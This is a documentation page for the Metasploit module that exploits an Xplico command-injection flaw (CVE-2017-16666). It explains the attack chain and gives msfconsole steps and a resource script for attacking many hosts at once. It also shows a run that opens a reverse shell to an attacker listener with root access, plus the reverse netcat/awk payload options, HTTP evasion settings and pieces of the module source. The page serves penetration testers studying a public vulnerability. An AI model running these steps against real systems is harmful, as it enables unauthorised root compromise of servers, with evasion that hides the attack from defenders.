Xplico Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/xplico_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Xplico Remote Code Execution
Module: exploit/linux/http/xplico_exec
Source code: modules/exploits/linux/http/xplico_exec.rb
Disclosure date: 2017-10-29
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 9876
List of CVEs: CVE-2017-16666

This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal command under the context of the root user. The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation. But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage. One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using xplico_exec against a single host

Normally, you can use exploit/linux/http/xplico_exec this way:

msf > use exploit/linux/http/xplico_exec
msf exploit(xplico_exec) > show targets
    ... a list of targets ...
msf exploit(xplico_exec) > set TARGET target-id
msf exploit(xplico_exec) > show options
    ... show and set options ...
msf exploit(xplico_exec) > exploit

Using xplico_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your xplico_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/xplico_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal command under the context of the root user.

The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation. But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage.

One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation.

Vulnerable Application Installation Steps

Follow instruction from "from sourceforge" section at following URL. Don't forget install version 1.2.0 instead of 1.0.0. At the time of this writing, installation commands contains command for version 1.0.0

http://wiki.xplico.org/doku.php?id=ubuntu

You may also give a try to virtualbox image provided by maintainer of Xplico. I've tested this module against Xplico-1.1.0-ubuntu-13.10-i386.ova. https://sourceforge.net/projects/xplico/files/VirtualBox%20images/

Username of the virtualbox image is "ubuntu" and password is "reverse".

Verification Steps


A successful check of the exploit will look like this:

  • [ ] Start msfconsole
  • [ ] use exploit/linux/http/securityonion_xplico_exec
  • [ ] Set RHOST
  • [ ] Set PAYLOAD cmd/unix/reverse_awk
  • [ ] Set LHOST
  • [ ] Run exploit
  • [ ] Verify that you are seeing New user successfully registered in console.
  • [ ] Verify that you are seeing User successfully activated in console.
  • [ ] Verify that you are seeing Successfully authenticated in console.
  • [ ] Verify that you are seeing New Case successfully creted in console.
  • [ ] Verify that you are seeing New Sols successfully creted in console.
  • [ ] Verify that you are seeing PCAP successfully uploaded. Pcap parser is going to start on server side in console.
  • [ ] Verify that you are getting We are at PCAP decoding phase. Little bit more patience... in console.
  • [ ] Verify that you have your root shell.

Scenarios


msf > use exploit/linux/http/securityonion_xplico_exec
msf exploit(securityonion_xplico_exec) > set RHOST 12.0.0.30
RHOST => 12.0.0.30
msf exploit(securityonion_xplico_exec) > 
msf exploit(securityonion_xplico_exec) > exploit 

[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(securityonion_xplico_exec) > set payload cmd/unix/
set payload cmd/unix/generic         set payload cmd/unix/reverse_netcat
set payload cmd/unix/reverse_awk     
msf exploit(securityonion_xplico_exec) > set payload cmd/unix/reverse_awk 
payload => cmd/unix/reverse_awk
msf exploit(securityonion_xplico_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(securityonion_xplico_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Initiating new session on server side
[*] Registering a new user
[+] New user successfully registered
[*] Username: mwbvnyowr
[*] Password: gHPkAvCTXFDVcfTwaAmfoJUoMNHNDIDT
[*] Calculating em_key code of the user
[*] Activating user with em_key = 159d4af63472e2a47e3f3c5c11205a5e
[+] User successfully activated
[*] Authenticating with our activated new user
[+] Successfully authenticated
[*] Creating new case
[+] New Case successfully creted. Our pol_id = 36
[*] Creating new xplico session for pcap
[+] New Sols successfully creted. Our sol_id = 54
[*] Uploading malformed PCAP file
[+] PCAP successfully uploaded. Pcap parser is going to start on server side.
[*] Parsing has started. Wait for parser to get the job done...
[+] We are at PCAP decoding phase. Little bit more patience...
[+] We are at PCAP decoding phase. Little bit more patience...
[+] We are at PCAP decoding phase. Little bit more patience...
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.30:39782) at 2017-11-08 14:44:52 +0300

id
uid=0(root) gid=0(root) groups=0(root)

Go back to menu.

Msfconsole Usage


Here is how the linux/http/xplico_exec exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/xplico_exec

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(linux/http/xplico_exec) > show info

       Name: Xplico Remote Code Execution
     Module: exploit/linux/http/xplico_exec
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-10-29

Provided by:
  Mehmet Ince <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    9876             yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 252
  Avoid: 2 characters

Description:
  This module exploits command injection vulnerability. 
  Unauthenticated users can register a new account and then execute a 
  terminal command under the context of the root user. The specific 
  flaw exists within the Xplico, which listens on TCP port 9876 by 
  default. The goal of Xplico is extract from an internet traffic 
  capture the applications data contained. There is a hidden end-point 
  at inside of the Xplico that allow anyone to create a new user. Once 
  the user created through /users/register endpoint, it must be 
  activated via activation e-mail. After the registration Xplico try 
  to send e-mail that contains activation code. Unfortunetly, this 
  e-mail probably not gonna reach to the given e-mail address on most 
  of installation. But it's possible to calculate exactly same token 
  value because of insecure cryptographic random string generator 
  function usage. One of the feature of Xplico is related to the 
  parsing PCAP files. Once PCAP file uploaded, Xplico execute an 
  operating system command in order to calculate checksum of the file. 
  Name of the for this operation is direclty taken from user input and 
  then used at inside of the command without proper input validation.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-16666
  https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666/
  https://www.xplico.org/archives/1538

Module Options


This is a complete list of options available in the linux/http/xplico_exec exploit:

msf6 exploit(linux/http/xplico_exec) > show options

Module options (exploit/linux/http/xplico_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    9876             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the linux/http/xplico_exec exploit:

msf6 exploit(linux/http/xplico_exec) > show advanced

Module advanced options (exploit/linux/http/xplico_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/xplico_exec module can exploit:

msf6 exploit(linux/http/xplico_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/xplico_exec exploit:

msf6 exploit(linux/http/xplico_exec) > show payloads

Compatible Payloads
===================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  payload/cmd/unix/bind_awk                           normal  No     Unix Command Shell, Bind TCP (via AWK)
   1  payload/cmd/unix/bind_netcat                        normal  No     Unix Command Shell, Bind TCP (via netcat)
   2  payload/cmd/unix/generic                            normal  No     Unix Command, Generic Command Execution
   3  payload/cmd/unix/pingback_bind                      normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   4  payload/cmd/unix/pingback_reverse                   normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   5  payload/cmd/unix/reverse_awk                        normal  No     Unix Command Shell, Reverse TCP (via AWK)
   6  payload/cmd/unix/reverse_netcat                     normal  No     Unix Command Shell, Reverse TCP (via netcat)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/xplico_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/xplico_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to extact hidden fields from registration form.


Here is a relevant code snippet related to the "Unable to extact hidden fields from registration form." error message:

102:	      csrf_token = res.get_hidden_inputs.first['data[_Token][key]'] || nil
103:	      fields = res.get_hidden_inputs.first['data[_Token][fields]'] || nil
104:	    end
105:	
106:	    if csrf_token.nil? || fields.nil?
107:	      fail_with(Failure::Unknown, 'Unable to extact hidden fields from registration form.')
108:	    end
109:	
110:	    # rand_mail_address sometimes generates buggy email address for this app. So we manually generate email address in here.
111:	    email = ''
112:	    email << rand_text_alpha_lower(rand(10)+4)

Could not register new user


Here is a relevant code snippet related to the "Could not register new user" error message:

134:	    if res && res.code == 302
135:	      print_good('New user successfully registered')
136:	      print_status("Username: #{username}")
137:	      print_status("Password: #{password}")
138:	    else
139:	      fail_with(Failure::Unknown, 'Could not register new user')
140:	    end
141:	
142:	    # Awesome. We have user. We need to activate it manually..!
143:	    print_status('Calculating em_key code of the user')
144:	

Could not activated our user. Target may not be vulnerable.


Here is a relevant code snippet related to the "Could not activated our user. Target may not be vulnerable." error message:

158:	    )
159:	
160:	    if res && res.code == 200 && res.body.include?('Registration Completed.')
161:	      print_good('User successfully activated')
162:	    else
163:	      fail_with(Failure::Unknown, 'Could not activated our user. Target may not be vulnerable.')
164:	    end
165:	  end
166:	
167:	  def login(username, password)
168:	    # yet another csrf token gathering.

Unable to extact hidden fields from login form.


Here is a relevant code snippet related to the "Unable to extact hidden fields from login form." error message:

177:	      csrf_token = res.get_hidden_inputs.first['data[_Token][key]'] || nil
178:	      fields = res.get_hidden_inputs.first['data[_Token][fields]'] || nil
179:	    end
180:	
181:	    if csrf_token.nil? || fields.nil?
182:	      fail_with(Failure::Unknown, 'Unable to extact hidden fields from login form.')
183:	    end
184:	
185:	    res = send_request_cgi!(
186:	      'method' => 'POST',
187:	      'uri' => normalize_uri(target_uri.path, 'users', 'login'),

Unable to login.


Here is a relevant code snippet related to the "Unable to login." error message:

197:	    )
198:	
199:	    if res && res.body.include?('<a href="/pols">Cases</a>')
200:	      print_good('Successfully authenticated')
201:	    else
202:	      fail_with(Failure::Unknown, 'Unable to login.')
203:	    end
204:	
205:	  end
206:	
207:	  def create_new_case

PCAP parsing process has finished. Haven't you got your shell ?


Here is a relevant code snippet related to the "PCAP parsing process has finished. Haven't you got your shell ?" error message:

308:	        print_good('We are at PCAP decoding phase. Little bit more patience...')
309:	      end
310:	      # Tbh decoding process is not going to be finished as long as we have msf session.
311:	      # We are not going to see this case if we are successful exploiting.
312:	      if res && res.body.include?('DECODING COMPLETED')
313:	        print_warning('PCAP parsing process has finished. Haven\'t you got your shell ?')
314:	        is_job_done = 1
315:	        next
316:	      end
317:	      sleep(1)
318:	      counter += 1

<PEER> - Target not vulnerable


Here is a relevant code snippet related to the "<PEER> - Target not vulnerable" error message:

321:	  end
322:	
323:	  def exploit
324:	
325:	    if check == Exploit::CheckCode::Safe
326:	      fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
327:	    end
328:	
329:	    # We need to access cookie from everywhere. Thus making it global variable.
330:	    @cookie = initiate_session
331:	    if @cookie.nil?

Unable to initiate new sessionid on server.


Here is a relevant code snippet related to the "Unable to initiate new sessionid on server." error message:

327:	    end
328:	
329:	    # We need to access cookie from everywhere. Thus making it global variable.
330:	    @cookie = initiate_session
331:	    if @cookie.nil?
332:	      fail_with(Failure::Unknown, 'Unable to initiate new sessionid on server.')
333:	    end
334:	
335:	    # We only need to access username and password for login func. Let's leave them as a local variables.
336:	    password = rand_text_alpha(32)
337:	    username = rand_text_alpha_lower(rand(8)+8)

Unable to create New Case.


Here is a relevant code snippet related to the "Unable to create New Case." error message:

339:	    login(username, password)
340:	
341:	    # We will need to have pol_id for creating new xplico session.
342:	    pol_id = create_new_case
343:	    if pol_id.nil?
344:	      fail_with(Failure::Unknown, 'Unable to create New Case.')
345:	    end
346:	    print_good("New Case successfully creted. Our pol_id = #{pol_id}")
347:	
348:	    # Create xplico session by using pol_id
349:	    sol_id = create_new_sol(pol_id)

Unable to create New Sol.


Here is a relevant code snippet related to the "Unable to create New Sol." error message:

346:	    print_good("New Case successfully creted. Our pol_id = #{pol_id}")
347:	
348:	    # Create xplico session by using pol_id
349:	    sol_id = create_new_sol(pol_id)
350:	    if sol_id.nil?
351:	      fail_with(Failure::Unknown, 'Unable to create New Sol.')
352:	    end
353:	    print_good("New Sols successfully creted. Our sol_id = #{sol_id}")
354:	
355:	    # Uploading malformed PCAP file. We are exploiting authenticated cmd inj in here.
356:	    upload_pcap(sol_id)

Go back to menu.


References


Authors


Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.